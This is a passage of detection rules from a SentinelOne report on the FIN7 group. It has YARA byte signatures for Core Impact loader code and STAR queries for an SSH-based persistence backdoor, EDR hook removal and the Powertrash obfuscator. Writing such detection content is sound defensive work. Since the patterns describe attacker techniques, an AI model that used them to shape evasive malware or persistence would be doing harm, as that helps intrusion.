    	$code1 = { 41 F7 ?? 41 03 ?? C1 FA 04 8B C2 C1 E8 1F 03 D0 6B C2 1F 44 ?? ?? 41 ?? ?? 01 }   	 
    	$code2 = { B9 02 02 00 00 48 8D ?? ?? ?? ?? ?? ?? [40-50] C7 ?? ?? ?? 47 6C 6F 62 C7 ?? ?? ?? 61 6C 5C 25 C7 ?? ?? ?? 30 38 78 00 FF 15 }   
    	$code3 = { C7 ?? ?? 47 6C 6F 62 [0-6] C7 ?? ?? 61 6C 5C 25 [0-6] C7 ?? ?? 30 38 78 00 [10-14] 50 6A 00 6A 00 FF 15 ?? ?? ?? ?? [8-12] FF 15 ?? ?? ?? ?? 3D B7 00 00 00 75 }
    condition:   	 
    	uint16(0) == 0x5A4D and filesize  60KB and 1 of ($code*)
}

rule PIC_CoreImpact_loader {
    meta:
    	author = "Antonio Cocomazzi @ SentinelOne"
    	description = "Detects Position Independent Code of Core Impact loaders observed in the wild"
    	date = "2023-04-17"
    	reference1 = "https://s1.ai/FIN7-u"
    	hash = "52e261a7cab837489dfcb8cd49aaf82ee287968c"
    strings:
    	$code1 = { E9 [4] 5B 48 B9 [8] 49 BA [70-100] E9 05 00 00 00 E8 }
    	$code2 = { E9 [4] 5B 53 48 BB [12] 49 BB [50-60] E9 05 00 00 00 E8}
    	$code3 = { E9 [4] 5B 48 B9 [10] 49 BC [70-100] E9 05 00 00 00 E8 }
    	$code4 = { E9 [4] 5B ?? ?? 49 BB [14] 48 B8 [70-100] E9 05 00 00 00 E8 }
    	$code5 = { E9 [4] 5B ?? 48 B8 [13] 48 B9 [50-60] E9 05 00 00 00 E8}
    	$code6 = { E9 [4] 5B ?? 48 B8 [12] 49 BD [70-100] E9 05 00 00 00 E8}
    	$code7 = { E9 [4] 5B 48 B9 [9] 48 BA [70-100] E9 05 00 00 00 E8}
    condition:   	 
    	1 of ($code*)
}

SentinelOne Singularity STAR Rules

// Detects SSH-based backdoor used by the FIN7 group as a persistence tactic
endpoint.os = 'windows' and meta.event.name = 'SCHEDTASKREGISTER' and src.process.cmdline contains ('WINDOWSOpenSSHssh.exe')
// Detects multiple C2 implants behaviors including Core Impact framework
endpoint.os = 'windows' and meta.event.name = 'BEHAVIORALINDICATORS' and indicator.name = 'MultipleHookRemovals' and indicator.metadata contains 'function name: ZwFreeVirtualMemory'
// Detects Powertrash obfuscator usage
endpoint.os = 'windows' and meta.event.name ='SCRIPTS' and src.process.name = 'powershell.exe' and cmdScript.content matches 'functions[0-9a-zA-Z]{3,7}r?n{r?n($[0-9a-zA-Z]{3,7}=.*r?n){10}'

Source: https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/